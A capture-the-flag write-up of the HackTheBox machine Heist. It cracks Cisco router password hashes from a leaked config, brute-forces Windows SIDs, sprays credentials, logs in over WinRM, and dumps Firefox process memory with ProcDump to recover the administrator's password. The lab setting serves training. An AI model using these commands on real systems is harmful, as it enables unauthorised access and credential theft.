HackTheBox - Heist

6 minute read

Heist was a nice 20 point box created by MinatoTW. It started out with finding a Cisco router config file and cracking some hashes, enumerating more users and then logging in via WinRM to get the user flag. We then dumped the local Firefox processes with ProcDump, used some simple PowerShell for basic process dump analysis, found admin credentials and logged in again via WinRM to get root.



We start the box with a quick TCP nmap scan:

# ports=$(nmap -sT -p- --min-rate=5000 --max-retries=2 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && 
nmap -sV -sC -T4 -p$ports

80/tcp    open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open  msrpc         Microsoft Windows RPC


Navigating to we come across a login page:

Clicking on ‘Login as guest’ leads us to issues.php which contains the following information:

Checking out the ‘Attachment’ on the first post by Hazard displays a config.txt file for their Cisco router:

version 12.2
no service pad
service password-encryption
isdn switch-type basic-5ess
hostname ios-1
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
ip ssh authentication-retries 5
ip ssh version 2
router bgp 100
 bgp log-neighbor-changes
 bgp dampening
 networkÂ mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
ip classless
ip route
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
no ip http server
no ip http secure-server
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

Hash Cracking

The config.txt file contains the following three hashes:

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

The number 7 next to the bottom two password hashes indicates that they are Cisco type 7 and can be easily decrypted at Cisco Password Cracker. The results are shown below:

The $1$pdQG$o8nrSzsGXeaduXrjlvKc91 hash can be cracked quickly with JohnTheRipper:

# john --wordlist=/root/rockyou.txt --rules hash 
stealth1agent    (?)


From what we’ve gathered so far we can create a list of usernames and passwords we’ve found and cracked in the config.txt file:

Hazard / ??? - stealth1agent maybe?
rout3r / $uperP@ssword
admin  / Q4)sJu\Y8qz*A3?d

Given that none of these credentials work on the first login screen we encountered on port 80, we can deduce that they are needed elsewhere in order for us to progress.

From our nmap scan we can see that SMB (445) and WinRM (5985) are both open, none of the creds succeded for WinRM but hazard / stealth1agent did work for SMB. However there wasn’t anything of use in any of the shares.


Leveraging the lookupsid.py script from Impacket we’re able to enumerate for more users with Hazard’s SMB credentials.

A Windows SID brute forcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.

# python lookupsid.py heist/hazard:stealth1agent@
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at
[*] StringBinding ncacn_np:[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

Descriptions of each Impacket script can be found here.


As we’ve now got a lot more usernames to work with, we can use CrackMapExec to check if any of the new usernames can be used with the passwords we already possess in order to log into SMB. First we need to create a usernames file:

# cat usernames 

Secondly we create a passwords file with the three hashes inside:

# cat passwords 

All we have to do now is run the following CrackMapExec command:

We see Chase / Q4)sJu\Y8qz*A3?d was successful.


Since WinRM is open (5985) we can use evil-winrm to log in with these credentials:

# ./evil-winrm.rb -i -u chase -p 'Q4)sJu\Y8qz*A3?d'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> whoami


All we have to do now is change directory and we get the user flag.

*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..
*Evil-WinRM* PS C:\Users\Chase> cd desktop
*Evil-WinRM* PS C:\Users\Chase\desktop> cat user.txt



During our usual enumeration we notice there are multiple Firefox processes running:

*Evil-WinRM* PS C:\Users\Chase\desktop> Get-Process 

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
   1233      68   106768     179916      27.86   2236   1 firefox
    343      20    10056      37456       0.55   3164   1 firefox
    408      31    17432      61252       2.02   4036   1 firefox
    390      30    27464      59848      22.55   4348   1 firefox
    358      26    16324      37588       0.47   6256   1 firefox  


ProcDump is a tool we can use to dump the Firefox process data.

ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. It also can serve as a general process dump utility that you can embed in other scripts.

Dumping Firefox Processes

Once you’ve downloaded ProcDump from the link in the previous section, we then need to upload it to Heist like so:

*Evil-WinRM* PS C:\Users\Chase\Documents> upload /root/Downloads/procdump.exe
Info: Uploading /root/Downloads/procdump.exe to .
Data: 868564 bytes of 868564 bytes copied
Info: Upload successful!

*Evil-WinRM* PS C:\Users\Chase\Documents> dir

    Directory: C:\Users\Chase\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       11/28/2019   7:13 PM         651424 procdump.exe 

With ProcDump successfully uploaded we can dump each Firefox process and then analyse the files for any sensitive information:

*Evil-WinRM* PS C:\Users\Chase\Documents> .\procdump.exe -accepteula -ma 6256
ProcDump v9.0 - Sysinternals process dump utility 
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com   
[19:14:54] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_191128_191454.dmp 
[19:14:55] Dump 1 writing: Estimated dump file size is 280 MB.         
[19:14:59] Dump 1 complete: 280 MB written in 5.0 seconds 
[19:15:00] Dump count reached.                                            

Process Dump Analysis

After dumping each process we can then use the PowerShell cmdlet Select-String to ‘grep’ through the dump file for specific words/patterns.

The Select-String cmdlet searches for text and text patterns in input strings and files.

Looking for instances of the string ‘admin’ we get the following information returned:

*Evil-WinRM* PS C:\Users\Chase\Documents> cat firefox.exe_191128_191454.dmp | Select-String -Pattern 'admin'  
_DATA_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_C¨^·(VœàšgÿP÷‚]CTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash                  
Reports\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla        
ram Files\Mozilla Firefox\browser\crashreporter-override.iniNU

Removing all the junk we see a login request made by the admin with their username and password in clear text:


With these credentials we’re able to login via WinRM as Administrator.

# ./evil-winrm.rb -i -u Administrator -p '4dD!5}x/re8]FBuZ'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami


All we have to do now is change directory and we get root.

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt